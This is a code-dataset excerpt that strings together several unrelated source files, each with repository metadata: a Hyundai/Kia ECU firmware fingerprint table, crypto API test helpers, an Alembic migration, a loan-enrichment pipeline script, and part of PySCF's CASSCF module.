b'\xf1\x00DN8_ SCC F-CU- 1.00 1.00 99110-L0000 ',
b'\xf1\x00DN8_ SCC F-CUP 1.00 1.00 99110-L0000 ',
],
(Ecu.esp, 0x7d1, None): [
b'\xf1\x00DN ESC \x01 102\x19\x04\x13 58910-L1300\xf1\xa01.02',
b'\xf1\x00DN ESC \x06 104\x19\x08\x01 58910-L0100',
b'\xf1\x8758910-L0100\xf1\x00DN ESC \x06 104\x19\x08\x01 58910-L0100\xf1\xa01.04',
b'\xf1\x8758910-L0100\xf1\x00DN ESC \x07 104\x19\x08\x01 58910-L0100\xf1\xa01.04',
],
(Ecu.engine, 0x7e0, None): [
b'HM6M2_0a0_BD0',
b'\xf1\x87391162M003\xf1\xa0000F',
b'\xf1\x87391162M003\xf1\xa00240',
b'HM6M1_0a0_F00',
],
(Ecu.eps, 0x7d4, None): [
b'\xf1\x8756310-L1010\xf1\x00DN8 MDPS C 1.00 1.03 56310-L1010 4DNDC103\xf1\xa01.03',
b'\xf1\x8756310L0010\x00\xf1\x00DN8 MDPS C 1.00 1.01 56310L0010\x00 4DNAC101\xf1\xa01.01',
b'\xf1\x8756310-L0010\xf1\x00DN8 MDPS C 1.00 1.01 56310-L0010 4DNAC101\xf1\xa01.01',
],
(Ecu.fwdCamera, 0x7c4, None): [
b'\xf1\x00DN8 MFC AT KOR LHD 1.00 1.02 99211-L1000 190422',
b'\xf1\x00DN8 MFC AT USA LHD 1.00 1.00 99211-L0000 190716',
b'\xf1\x00DN8 MFC AT USA LHD 1.00 1.01 99211-L0000 191016',
],
(Ecu.transmission, 0x7e1, None): [
b'\xf1\x00HT6TA260BLHT6TA800A1TDN8C20KS4\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
b'\xf1\x00bcsh8p54 U903\x00\x00\x00\x00\x00\x00SDN8T16NB0z{\xd4v',
b'\xf1\x00HT6WA250BLHT6WA910A1SDN8G25NB1\x00\x00\x00\x00\x00\x00\x96\xa1\xf1\x92',
b'\xf1\x00HT6WA250BLHT6WA910A1SDN8G25NB1\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00',
],
},
CAR.SONATA_LF: {
(Ecu.fwdRadar, 0x7d0, None): [
b'\xf1\x00LF__ SCC F-CUP 1.00 1.00 96401-C2200 ',
],
(Ecu.esp, 0x7d1, None): [
b'\xf1\x00LF ESC \t 11 \x17\x01\x13 58920-C2610',
],
(Ecu.engine, 0x7e0, None): [
b'\xf1\x81606D5K51\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.fwdCamera, 0x7c4, None): [
b'\xf1\x00LFF LKAS AT USA LHD 1.00 1.01 95740-C1000 E51',
b'\xf1\xa01.01',
],
(Ecu.transmission, 0x7e1, None): [
b'\xf1\x87\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf1\x816T6B4051\x00\x00\xf1\x006T6H0_C2\x00\x006T6B4051\x00\x00TLF0G24NL1\xb0\x9f\xee\xf5',
b'\xf1\x87\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xf1\x816T6B4051\x00\x00\xf1\x006T6H0_C2\x00\x006T6B4051\x00\x00TLF0G24NL1\x00\x00\x00\x00',
b'\xf1\x006T6H0_C2\x00\x006T6B4051\x00\x00TLF0G24NL1\xb0\x9f\xee\xf5',
],
},
CAR.SANTA_FE: {
(Ecu.fwdRadar, 0x7d0, None): [
b'\xf1\x00TM__ SCC F-CUP 1.00 1.03 99110-S2000 \xf1\xa01.03',
b'\xf1\x00TM__ SCC F-CUP 1.00 1.02 99110-S2000 \xf1\xa01.02',
],
(Ecu.esp, 0x7d1, None): [
b'\xf1\x00TM ESC \r 104\x19\a\b 58910-S2650\xf1\xa01.04',
b'\xf1\x00TM ESC \x02 100\x18\x030 58910-S2600\xf1\xa01.00',
],
(Ecu.engine, 0x7e0, None): [
b'\xf1\x81606G3051\x00\x00\x00\x00\x00\x00\x00\x00',
b'\xf1\x81606EA051\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7d4, None): [
b'\xf1\x00TM MDPS C 1.00 1.01 56340-S2000 9129',
b'\xf1\x00TM MDPS C 1.00 1.00 56340-S2000 8409',
],
(Ecu.fwdCamera, 0x7c4, None): [
b'\xf1\x00TM MFC AT USA LHD 1.00 1.00 99211-S2000 180409',
],
(Ecu.transmission, 0x7e1, None): [
b'\xf1\x87LDLUEA6159884HG1\x88\x87hv\x99\x99y\x97\x89\xaa\xb8\x9ax\x99\x87\x89y\x99\xb7\x99\xa7?\xf7\xff\x97wo\xff\xf3\x05\xf1\x816W3E1051\x00\x00\xf1\x006W351_C2\x00\x006W3E1051\x00\x00TTM4T20NS5\x00\x00\x00\x00',
b'\xf1\x87SBJWAA6562474GG0ffvgeTeFx\x88\x97\x88ww\x87www\x87w\x84o\xfa\xff\x87fO\xff\xc2 \xf1\x816W3C2051\x00\x00\xf1\x006W351_C2\x00\x006W3C2051\x00\x00TTM2G24NS1\x00\x00\x00\x00',
],
},
CAR.KIA_STINGER: {
(Ecu.fwdRadar, 0x7d0, None): [ b'\xf1\x00CK__ SCC F_CUP 1.00 1.01 96400-J5100 \xf1\xa01.01'],
(Ecu.engine, 0x7e0, None): [ b'\xf1\x81640E0051\x00\x00\x00\x00\x00\x00\x00\x00',],
(Ecu.eps, 0x7d4, None): [b'\xf1\x00CK MDPS R 1.00 1.04 57700-J5420 4C4VL104'],
(Ecu.fwdCamera, 0x7c4, None): [b'\xf1\x00CK MFC AT USA LHD 1.00 1.03 95740-J5000 170822'],
(Ecu.transmission, 0x7e1, None): [
b'\xf1\x87VDHLG17118862DK2\x8awWwgu\x96wVfUVwv\x97xWvfvUTGTx\x87o\xff\xc9\xed\xf1\x81E21\x00\x00\x00\x00\x00\x00\x00\xf1\x00bcsh8p54 E21\x00\x00\x00\x00\x00\x00\x00SCK0T33NB0\x88\xa2\xe6\xf0',
b'\xf1\x87VDHLG17000192DK2xdFffT\xa5VUD$DwT\x86wveVeeD&T\x99\xba\x8f\xff\xcc\x99\xf1\x81E21\x00\x00\x00\x00\x00\x00\x00\xf1\x00bcsh8p54 E21\x00\x00\x00\x00\x00\x00\x00SCK0T33NB0\x88\xa2\xe6\xf0',
],
},
CAR.KIA_OPTIMA_H: {
(Ecu.fwdRadar, 0x7d0, None): [b'\xf1\x00DEhe SCC H-CUP 1.01 1.02 96400-G5100 ',],
(Ecu.engine, 0x7e0, None): [b'\xf1\x816H6F4051\x00\x00\x00\x00\x00\x00\x00\x00',],
(Ecu.eps, 0x7d4, None): [b'\xf1\x00DE MDPS C 1.00 1.09 56310G5301\x00 4DEHC109',],
(Ecu.fwdCamera, 0x7c4, None): [b'\xf1\x00DEP MFC AT USA LHD 1.00 1.01 95740-G5010 170424',],
(Ecu.transmission, 0x7e1, None): [b"\xf1\x816U3J2051\x00\x00\xf1\x006U3H0_C2\x00\x006U3J2051\x00\x00PDE0G16NS2\xf4'\\\x91",],
},
CAR.PALISADE: {
(Ecu.fwdRadar, 0x7d0, None): [
b'\xf1\x00LX2_ SCC FHCUP 1.00 1.04 99110-S8100 \xf1\xa01.04',
b'\xf1\x00LX2 SCC FHCUP 1.00 1.04 99110-S8100 \xf1\xa01.04',
],
(Ecu.esp, 0x7d1, None): [
b'\xf1\x00LX ESC \v 102\x19\x05\a 58910-S8330\xf1\xa01.02',
b'\xf1\x00LX ESC \v 103\x19\t\x10 58910-S8360\xf1\xa01.03',
b'\xf1\x00LX ESC \x01 103\x19\t\x10 58910-S8360\xf1\xa01.03',
b'\xf1\x00LX ESC \x0b 102\x19\x05\x07 58910-S8330',
],
(Ecu.engine, 0x7e0, None): [
b'\xf1\x81640J0051\x00\x00\x00\x00\x00\x00\x00\x00',
b'\xf1\x81640K0051\x00\x00\x00\x00\x00\x00\x00\x00',
],
(Ecu.eps, 0x7d4, None): [
b'\xf1\x00LX2 MDPS C 1,00 1,03 56310-S8020 4LXDC103', # modified firmware
b'\xf1\x00LX2 MDPS C 1.00 1.03 56310-S8020 4LXDC103',
],
(Ecu.fwdCamera, 0x7c4, None): [
b'\xf1\x00LX2 MFC AT USA LHD 1.00 1.03 99211-S8100 190125',
b'\xf1\x00LX2 MFC AT USA LHD 1.00 1.05 99211-S8100 190909',
],
(Ecu.transmission, 0x7e1, None): [
b'\xf1\x87LBLUFN650868KF36\xa9\x98\x89\x88\xa8\x88\x88\x88h\x99\xa6\x89fw\x86gw\x88\x97x\xaa\x7f\xf6\xff\xbb\xbb\x8f\xff+\x82\xf1\x81U891\x00\x00\x00\x00\x00\x00\xf1\x00bcsh8p54 U891\x00\x00\x00\x00\x00\x00SLX2G38NB3\xd1\xc3\xf8\xa8',
b'\xf1\x87LBLUFN655162KF36\x98\x88\x88\x88\x98\x88\x88\x88x\x99\xa7\x89x\x99\xa7\x89x\x99\x97\x89g\x7f\xf7\xffwU_\xff\xe9!\xf1\x81U891\x00\x00\x00\x00\x00\x00\xf1\x00bcsh8p54 U891\x00\x00\x00\x00\x00\x00SLX2G38NB3\xd1\xc3\xf8\xa8',
b'\xf1\x87LDKVBN424201KF26\xba\xaa\x9a\xa9\x99\x99\x89\x98\x89\x99\xa8\x99\x88\x99\x98\x89\x88\x99\xa8\x89v\x7f\xf7\xffwf_\xffq\xa6\xf1\x81U891\x00\x00\x00\x00\x00\x00\xf1\x00bcsh8p54 U891\x00\x00\x00\x00\x00\x00SLX4G38NB2\xafL]\xe7',
b'\xf1\x87LDLVBN560098KF26\x86fff\x87vgfg\x88\x96xfw\x86gfw\x86g\x95\xf6\xffeU_\xff\x92c\xf1\x81U891\x00\x00\x00\x00\x00\x00\xf1\x00bcsh8p54 U891\x00\x00\x00\x00\x00\x00SLX4G38NB2\xafL]\xe7',
],
},
CAR.VELOSTER: {
(Ecu.fwdRadar, 0x7d0, None): [b'\xf1\x00JS__ SCC H-CUP 1.00 1.02 95650-J3200 ', ],
(Ecu.esp, 0x7d1, None): [b'\xf1\x00\x00\x00\x00\x00\x00\x00', ],
(Ecu.engine, 0x7e0, None): [b'\x01TJS-JNU06F200H0A', ],
(Ecu.eps, 0x7d4, None): [b'\xf1\x00JSL MDPS C 1.00 1.03 56340-J3000 8308', ],
(Ecu.fwdCamera, 0x7c4, None): [b'\xf1\x00JS LKAS AT USA LHD 1.00 1.02 95740-J3000 K32', ],
(Ecu.transmission, 0x7e1, None): [
b'\xf1\x816U2V8051\x00\x00\xf1\x006U2V0_C2\x00\x006U2V8051\x00\x00DJS0T16NS1\xba\x02\xb8\x80',
b'\xf1\x816U2V8051\x00\x00\xf1\x006U2V0_C2\x00\x006U2V8051\x00\x00DJS0T16NS1\x00\x00\x00\x00',
],
},
CAR.GENESIS_G70: {
(Ecu.fwdRadar, 0x7d0, None): [b'\xf1\x00IK__ SCC F-CUP 1.00 1.02 96400-G9100 \xf1\xa01.02', ],
(Ecu.engine, 0x7e0, None): [b'\xf1\x81640F0051\x00\x00\x00\x00\x00\x00\x00\x00', ],
(Ecu.eps, 0x7d4, None): [b'\xf1\x00IK MDPS R 1.00 1.06 57700-G9420 4I4VL106', ],
(Ecu.fwdCamera, 0x7c4, None): [b'\xf1\x00IK MFC AT USA LHD 1.00 1.01 95740-G9000 170920', ],
(Ecu.transmission, 0x7e1, None): [b'\xf1\x87VDJLT17895112DN4\x88fVf\x99\x88\x88\x88\x87fVe\x88vhwwUFU\x97eFex\x99\xff\xb7\x82\xf1\x81E25\x00\x00\x00\x00\x00\x00\x00\xf1\x00bcsh8p54 E25\x00\x00\x00\x00\x00\x00\x00SIK0T33NB2\x11\x1am\xda', ],
},
CAR.KONA: {
(Ecu.fwdRadar, 0x7d0, None): [b'\xf1\x00OS__ SCC F-CUP 1.00 1.00 95655-J9200 \xf1\xa01.00', ],
(Ecu.esp, 0x7d1, None): [b'\xf1\x816V5RAK00018.ELF\xf1\x00\x00\x00\x00\x00\x00\x00\xf1\xa01.05', ],
(Ecu.engine, 0x7e0, None): [b'"\x01TOS-0NU06F301J02', ],
(Ecu.eps, 0x7d4, None): [b'\xf1\x00OS MDPS C 1.00 1.05 56310J9030\x00 4OSDC105', ],
(Ecu.fwdCamera, 0x7c4, None): [b'\xf1\x00OS9 LKAS AT USA LHD 1.00 1.00 95740-J9300 g21', ],
(Ecu.transmission, 0x7e1, None): [b'\xf1\x816U2VE051\x00\x00\xf1\x006U2V0_C2\x00\x006U2VE051\x00\x00DOS4T16NS3\x00\x00\x00\x00', ],
},
CAR.KONA_EV: {
(Ecu.esp, 0x7D1, None): [b'\xf1\x00OS IEB \r 105\x18\t\x18 58520-K4000\xf1\xa01.05', ],
(Ecu.fwdCamera, 0x7C4, None): [b'\xf1\x00OSE LKAS AT EUR LHD 1.00 1.00 95740-K4100 W40', ],
(Ecu.eps, 0x7D4, None): [b'\xf1\x00OS MDPS C 1.00 1.04 56310K4050\x00 4OEDC104', ],
(Ecu.fwdRadar, 0x7D0, None): [b'\xf1\x00OSev SCC F-CUP 1.00 1.01 99110-K4000 \xf1\xa01.01', ],
},
CAR.KIA_NIRO_EV: {
(Ecu.fwdRadar, 0x7D0, None): [
b'\xf1\x00DEev SCC F-CUP 1.00 1.03 96400-Q4100 \xf1\xa01.03',
b'\xf1\x00DEev SCC F-CUP 1.00 1.00 99110-Q4000 \xf1\xa01.00',
],
(Ecu.esp, 0x7D1, None): [
b'\xf1\xa01.06',
b'\xf1\xa01.07',
],
(Ecu.eps, 0x7D4, None): [
b'\xf1\x00DE MDPS C 1.00 1.05 56310Q4000\x00 4DEEC105',
b'\xf1\x00DE MDPS C 1.00 1.05 56310Q4100\x00 4DEEC105',
],
(Ecu.fwdCamera, 0x7C4, None): [
b'\xf1\x00DEE MFC AT USA LHD 1.00 1.03 95740-Q4000 180821',
b'\xf1\x00DEE MFC AT EUR LHD 1.00 1.00 99211-Q4000 191211',
],
},
CAR.KIA_OPTIMA: {
(Ecu.fwdRadar, 0x7d0, None): [b'\xf1\x00JF__ SCC F-CUP 1.00 1.00 96400-D4110 '],
(Ecu.esp, 0x7d1, None): [b'\xf1\x00JF ESC \v 11 \x18\x030 58920-D5180',],
(Ecu.engine, 0x7e0, None): [b'\x01TJFAJNU06F201H03'],
(Ecu.eps, 0x7d4, None): [b'\xf1\x00TM MDPS C 1.00 1.00 56340-S2000 8409'],
(Ecu.fwdCamera, 0x7c4, None): [b'\xf1\x00JFA LKAS AT USA LHD 1.00 1.02 95895-D5000 h31'],
(Ecu.transmission, 0x7e1, None): [b'\xf1\x816U2V8051\x00\x00\xf1\x006U2V0_C2\x00\x006U2V8051\x00\x00DJF0T16NL0\t\xd2GW'],
}
}
CHECKSUM = {
"crc8": [CAR.SANTA_FE, CAR.SONATA, CAR.PALISADE],
"6B": [CAR.KIA_SORENTO, CAR.HYUNDAI_GENESIS],
}
FEATURES = {
# which message has the gear
"use_cluster_gears": set([CAR.ELANTRA, CAR.ELANTRA_GT_I30, CAR.KONA]),
"use_tcu_gears": set([CAR.KIA_OPTIMA, CAR.SONATA_LF, CAR.VELOSTER]),
"use_elect_gears": set([CAR.KIA_NIRO_EV, CAR.KIA_OPTIMA_H, CAR.IONIQ_EV_LTD, CAR.KONA_EV, CAR.IONIQ, CAR.IONIQ_EV_2020]),
# these cars use the FCA11 message for the AEB and FCW signals, all others use SCC12
"use_fca": set([CAR.SONATA, CAR.ELANTRA, CAR.ELANTRA_GT_I30, CAR.KIA_STINGER, CAR.IONIQ, CAR.IONIQ_EV_2020, CAR.KONA_EV, CAR.KIA_FORTE, CAR.KIA_NIRO_EV, CAR.PALISADE, CAR.GENESIS_G70, CAR.KONA]),
"use_bsm": set([CAR.SONATA, CAR.PALISADE, CAR.HYUNDAI_GENESIS, CAR.GENESIS_G70, CAR.GENESIS_G80, CAR.GENESIS_G90, CAR.KONA, CAR.IONIQ_EV_2020]),
}
EV_HYBRID = set([CAR.IONIQ_EV_2020, CAR.IONIQ_EV_LTD, CAR.IONIQ, CAR.KONA_EV, CAR.KIA_NIRO_EV])
DBC = {
CAR.ELANTRA: dbc_dict('hyundai_kia_generic', None),
CAR.ELANTRA_GT_I30: dbc_dict('hyundai_kia_generic', None),
CAR.GENESIS_G70: dbc_dict('hyundai_kia_generic', None),
CAR.GENESIS_G80: dbc_dict('hyundai_kia_generic', None),
CAR.GENESIS_G90: dbc_dict('hyundai_kia_generic', None),
CAR.HYUNDAI_GENESIS: dbc_dict('hyundai_kia_generic', None),
CAR.IONIQ_EV_2020: dbc_dict('hyundai_kia_generic', None),
CAR.IONIQ_EV_LTD: dbc_dict('hyundai_kia_generic', None),
CAR.IONIQ: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_FORTE: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_NIRO_EV: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_OPTIMA: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_OPTIMA_H: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_SORENTO: dbc_dict('hyundai_kia_generic', None),
CAR.KIA_STINGER: dbc_dict('hyundai_kia_generic', None),
CAR.KONA: dbc_dict('hyundai_kia_generic', None),
CAR.KONA_EV: dbc_dict('hyundai_kia_generic', None),
CAR.SANTA_FE: dbc_dict('hyundai_kia_generic', None),
CAR.SONATA: dbc_dict('hyundai_kia_generic', None),
CAR.SONATA_LF: dbc_dict('hyundai_kia_generic', None),
CAR.PALISADE: dbc_dict('hyundai_kia_generic', None),
CAR.VELOSTER: dbc_dict('hyundai_kia_generic', None),
}
STEER_THRESHOLD = 150
| 86.098086 | 928 | 0.588346 |
8962c9b54edfae60a7f4e59aecda1c9e188cd64a | 2,080 | py | Python | test/helpers.py | edwinschrubb/cryptoapi | 0b4351560c4d55a3f38847f94f82c0a34afe87bc | [
"MIT"
] | 9 | 2020-08-07T04:12:45.000Z | 2022-03-15T03:28:43.000Z | test/helpers.py | edwinschrubb/cryptoapi | 0b4351560c4d55a3f38847f94f82c0a34afe87bc | [
"MIT"
] | null | null | null | test/helpers.py | edwinschrubb/cryptoapi | 0b4351560c4d55a3f38847f94f82c0a34afe87bc | [
"MIT"
] | 4 | 2020-08-07T08:48:22.000Z | 2021-12-23T05:18:24.000Z | from unittest.mock import MagicMock
BOOK_METADATA = {
'timestamp': None,
'datetime': None,
'nonce': None
}
TEST_MARKET = {
'percentage': True,
'tierBased': True,
'maker': 0.001,
'taker': 0.002,
'tiers': {
'taker': [
[0, 0.002],
[500000, 0.002],
[1000000, 0.002],
[2500000, 0.002],
[5000000, 0.002],
[7500000, 0.002],
[10000000, 0.0018],
[15000000, 0.0016],
[20000000, 0.0014000000000000002],
[25000000, 0.0012],
[30000000, 0.001]
],
'maker': [
[0, 0.001],
[500000, 0.0008],
[1000000, 0.0006],
[2500000, 0.0004],
[5000000, 0.0002],
[7500000, 0],
[10000000, 0],
[15000000, 0],
[20000000, 0],
[25000000, 0],
[30000000, 0]
]
},
'precision': {
'price': 5,
'amount': 8
},
'limits': {
'amount': {
'min': 0.0006,
'max': 2000.0
},
'price': {
'min': 1e-05,
'max': 100000.0
},
'cost': {
'min': 6e-09,
'max': None
}
},
'id': 'BTCUSD',
'symbol': 'BTC/USD',
'base': 'BTC',
'quote': 'USD',
'baseId': 'BTC',
'quoteId': 'USD',
'active': True,
'info': {
'pair': 'btcusd',
'price_precision': 5,
'initial_margin': '20.0',
'minimum_margin': '10.0',
'maximum_order_size': '2000.0',
'minimum_order_size': '0.0006',
'expiration': 'NA',
'margin': True
}
}
class AsyncMock(MagicMock):
async def __call__(self, *args, **kwargs):
return super().__call__(*args, **kwargs)
class AsyncContextManager(MagicMock):
async def __aenter__(self, *args, **kwargs):
return super().__enter__(*args, **kwargs)
async def __aexit__(self, *args, **kwargs):
return super().__exit__(*args, **kwargs)
| 22.857143 | 49 | 0.439904 |
810d005ae1576ecf6d7c0f234b9b74efbcffb9d3 | 657 | py | Python | restapi/migrations/versions/99100c610a3e_.py | ninjadotorg/KPI | 430617a1e85304a254cc7364d524d721b8d45b11 | [
"MIT"
] | 2 | 2020-06-30T18:03:12.000Z | 2021-09-02T11:31:59.000Z | restapi/migrations/versions/99100c610a3e_.py | ninjadotorg/KPI | 430617a1e85304a254cc7364d524d721b8d45b11 | [
"MIT"
] | 10 | 2020-09-05T23:29:52.000Z | 2022-03-11T23:36:59.000Z | restapi/migrations/versions/99100c610a3e_.py | ninjadotorg/KPI | 430617a1e85304a254cc7364d524d721b8d45b11 | [
"MIT"
] | null | null | null | """empty message
Revision ID: 99100c610a3e
Revises: d36e6e98140c
Create Date: 2018-12-13 15:50:36.975372
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '99100c610a3e'
down_revision = 'd36e6e98140c'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.add_column('user', sa.Column('avatar', sa.String(length=255), nullable=True))
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_column('user', 'avatar')
# ### end Alembic commands ###
| 22.655172 | 84 | 0.69102 |
be83aff961eff0b4af669019489eb317a246cd7d | 1,920 | py | Python | examples/beta/lending-club/loans-enriched/enrich_loans.py | admariner/beneath | a6aa2c220e4a646be792379528ae673f4bef440b | [
"MIT"
] | 65 | 2021-04-27T13:13:09.000Z | 2022-01-24T00:26:06.000Z | examples/beta/lending-club/loans-enriched/enrich_loans.py | admariner/beneath | a6aa2c220e4a646be792379528ae673f4bef440b | [
"MIT"
] | 22 | 2021-10-06T10:30:40.000Z | 2021-12-10T11:36:55.000Z | examples/beta/lending-club/loans-enriched/enrich_loans.py | admariner/beneath | a6aa2c220e4a646be792379528ae673f4bef440b | [
"MIT"
] | 4 | 2021-04-24T15:29:51.000Z | 2022-03-30T16:20:12.000Z | import beneath
import joblib
# config
INPUT_TABLE = "loans"
OUTPUT_TABLE = "loans-enriched"
OUTPUT_SCHEMA = open("loans_enriched.graphql", "r").read()
# load ML model to use for predictions
clf = joblib.load('model.pkl')
async def process_loan(loan):
# use the pre-trained classifier to predict whether the borrower will default on its loan
X = [[ loan['term'], loan['int_rate'], loan['loan_amount'], loan['annual_inc'],
loan['acc_now_delinq'], loan['dti'], loan['fico_range_high'], loan['open_acc'],
loan['pub_rec'], loan['revol_util'] ]]
try:
y_pred = clf.predict(X)[0]
except:
y_pred = False
# create enriched loan record
enriched_loan = {
"id" : loan['id'],
"list_d" : loan['list_d'],
"issue_d" : loan['issue_d'],
"grade" : loan['grade'],
"sub_grade" : loan['sub_grade'],
"term" : loan['term'],
"int_rate" : loan['int_rate'],
"loan_amount" : loan['loan_amount'],
"purpose" : loan['purpose'],
"home_ownership" : loan['home_ownership'],
"annual_inc" : loan['annual_inc'],
"addr_state" : loan['addr_state'],
"acc_now_delinq" : loan['acc_now_delinq'],
"dti" : loan['dti'],
"fico_range_high" : loan['fico_range_high'],
"open_acc" : loan['open_acc'],
"pub_rec" : loan['pub_rec'],
"revol_util" : loan['revol_util'],
"loan_status" : loan['loan_status'],
"loan_status_predicted" : str(y_pred)
}
yield enriched_loan
if __name__ == "__main__":
# EASY OPTION
beneath.easy_derive_table(
input_table_path=INPUT_TABLE,
apply_fn=process_loan,
output_table_path=OUTPUT_TABLE,
output_table_schema=OUTPUT_SCHEMA,
)
# DETAILED OPTION
# p = beneath.Pipeline(parse_args=True)
# loans = p.read_table(INPUT_TABLE)
# loans_enriched = p.apply(loans, process_loan)
# p.write_table(loans_enriched, OUTPUT_TABLE, OUTPUT_SCHEMA)
# p.main()
| 30.47619 | 91 | 0.645313 |
6db3ef375d885aa098c133ca2e6256e148091d7f | 1,738 | py | Python | src/command/args/namespace.py | vincent-lg/talismud | 645bdae3d2e71cde51a25fe48c8f1bde15319631 | [
"BSD-3-Clause"
] | 4 | 2020-05-16T21:58:55.000Z | 2020-08-29T11:17:31.000Z | src/command/args/namespace.py | vincent-lg/talismud | 645bdae3d2e71cde51a25fe48c8f1bde15319631 | [
"BSD-3-Clause"
] | 1 | 2020-12-15T11:22:32.000Z | 2020-12-15T11:22:32.000Z | src/command/args/namespace.py | vincent-lg/talismud | 645bdae3d2e71cde51a25fe48c8f1bde15319631 | [
"BSD-3-Clause"
] | null | null | null | # Copyright (c) 2020-20201, LE GOFF Vincent
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS
# BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,
# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
# OF THE POSSIBILITY OF SUCH DAMAGE.
"""Namespace for proper argument parsing."""
class Namespace:
"""Simple class to contain a user namespace."""
def __repr__(self):
return f"Namespace{self.__dict__}"
| 45.736842 | 78 | 0.772727 |
13202f7089f8f004511b2eb5b67f3c9aba057bad | 103,590 | py | Python | pyscf/mcscf/mc1step.py | smgarner229/pyscf | b4f00378012e14ca5f7058f753cc0d586aa436b7 | [
"Apache-2.0"
] | null | null | null | pyscf/mcscf/mc1step.py | smgarner229/pyscf | b4f00378012e14ca5f7058f753cc0d586aa436b7 | [
"Apache-2.0"
] | null | null | null | pyscf/mcscf/mc1step.py | smgarner229/pyscf | b4f00378012e14ca5f7058f753cc0d586aa436b7 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright 2014-2018 The PySCF Developers. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# Author: Qiming Sun <osirpt.sun@gmail.com>
#
import sys
import time
import copy
import os
from functools import reduce
import numpy
import scipy.linalg
from pyscf import lib, tools
from pyscf.lib import logger
from pyscf.mcscf import casci, addons
from pyscf.mcscf.casci import get_fock, cas_natorb, canonicalize
from pyscf.mcscf import mc_ao2mo
from pyscf.mcscf import chkfile
from pyscf import ao2mo, scf
from pyscf import gto
from pyscf import fci
from pyscf.soscf import ciah
from pyscf.data import nist
from pyscf import __config__
import scipy
import scipy.optimize
WITH_MICRO_SCHEDULER = getattr(__config__, 'mcscf_mc1step_CASSCF_with_micro_scheduler', False)
WITH_STEPSIZE_SCHEDULER = getattr(__config__, 'mcscf_mc1step_CASSCF_with_stepsize_scheduler', True)
# ref. JCP, 82, 5053; JCP, 73, 2342
# gradients, hessian operator and hessian diagonal
def gen_g_hop(casscf, mo, u, casdm1, casdm2, eris, get_g=False):
ncas = casscf.ncas
nelecas = casscf.nelecas
ncore = casscf.ncore
nocc = ncas + ncore
nmo = mo.shape[1]
dm1 = numpy.zeros((nmo,nmo))
idx = numpy.arange(ncore)
dm1[idx,idx] = 2
dm1[ncore:nocc,ncore:nocc] = casdm1
# part5
jkcaa = numpy.empty((nocc,ncas))
# part2, part3
vhf_a = numpy.empty((nmo,nmo))
# part1 ~ (J + 2K)
dm2tmp = casdm2.transpose(1,2,0,3) + casdm2.transpose(0,2,1,3)
dm2tmp = dm2tmp.reshape(ncas**2,-1)
hdm2 = numpy.empty((nmo,ncas,nmo,ncas))
g_dm2 = numpy.empty((nmo,ncas))
for i in range(nmo):
jbuf = eris.ppaa[i]
kbuf = eris.papa[i]
if i < nocc:
jkcaa[i] = numpy.einsum('ik,ik->i', 6*kbuf[:,i]-2*jbuf[i], casdm1)
vhf_a[i] =(numpy.einsum('quv,uv->q', jbuf, casdm1)
- numpy.einsum('uqv,uv->q', kbuf, casdm1) * .5)
jtmp = lib.dot(jbuf.reshape(nmo,-1), casdm2.reshape(ncas*ncas,-1))
jtmp = jtmp.reshape(nmo,ncas,ncas)
ktmp = lib.dot(kbuf.transpose(1,0,2).reshape(nmo,-1), dm2tmp)
hdm2[i] = (ktmp.reshape(nmo,ncas,ncas)+jtmp).transpose(1,0,2)
g_dm2[i] = numpy.einsum('uuv->v', jtmp[ncore:nocc])
jbuf = kbuf = jtmp = ktmp = dm2tmp = None
vhf_ca = eris.vhf_c + vhf_a
